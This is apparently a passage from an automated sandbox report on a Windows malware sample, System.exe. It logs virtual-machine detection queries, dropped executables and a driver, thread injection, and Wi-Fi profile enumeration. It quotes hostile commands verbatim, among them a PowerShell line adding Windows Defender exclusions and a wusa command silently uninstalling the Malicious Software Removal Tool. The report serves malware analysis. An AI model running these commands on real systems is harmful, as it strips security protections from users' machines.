              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries memory information (via WMI often done to detect virtual machines)
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_PnPEntity
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\System.exeMemory allocated: 1768EA60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\System.exeMemory allocated: 176A8480000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Users\user\Desktop\System.exeWindow / User API: threadDelayed 9872Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8686Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1181Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9928
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeDropped PE file which has not been started: C:\Windows\Temp\ubgiupusihqd.sysJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeAPI coverage: 7.2 %
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeAPI coverage: 7.2 %
              Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -598891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\System.exe TID: 2900Thread sleep time: -598563s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6632Thread sleep count: 8686 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 1181 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8472Thread sleep count: 9928 > 30
              Source: C:\Windows\System32\svchost.exe TID: 8876Thread sleep count: 41 > 30
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\Desktop\System.exeThread delayed: delay time: 598563Jump to behavior
              Source: System.exe, 00000000.00000002.295339622458.000001768E898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: System.exe, 00000000.00000002.295346194625.00000176A0490000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.000001769060E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure DriverSystemEnableMicrosoft Hyper-V Virtualization Infrastructure Driver
              Source: C:\Users\user\Desktop\System.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD2118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,2_2_00007FF73FD2118B
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD211D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,2_2_00007FF73FD211D8
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,40_2_00007FF7938D118B
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,40_2_00007FF7938D11D8
              Source: C:\Windows\System32\conhost.exeCode function: 63_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,63_2_0000000140001160
              Source: C:\Users\user\Desktop\System.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Modifies the context of a thread in another process (thread injection)
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeThread register set: target process: 8744
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeThread register set: target process: 6376
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" Jump to behavior
              Source: C:\Users\user\Desktop\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Managerp^
              Source: System.exe, 00000000.00000002.295340608074.000001769060E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp^
              Source: System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager2
              Source: System.exe, 00000000.00000002.295346194625.00000176A1359000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0D05000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager
              Source: C:\Users\user\Desktop\System.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\System.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\System.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
              Source: C:\Users\user\Desktop\System.exeQueries volume information: C:\Users\user\Desktop\System.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\System.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
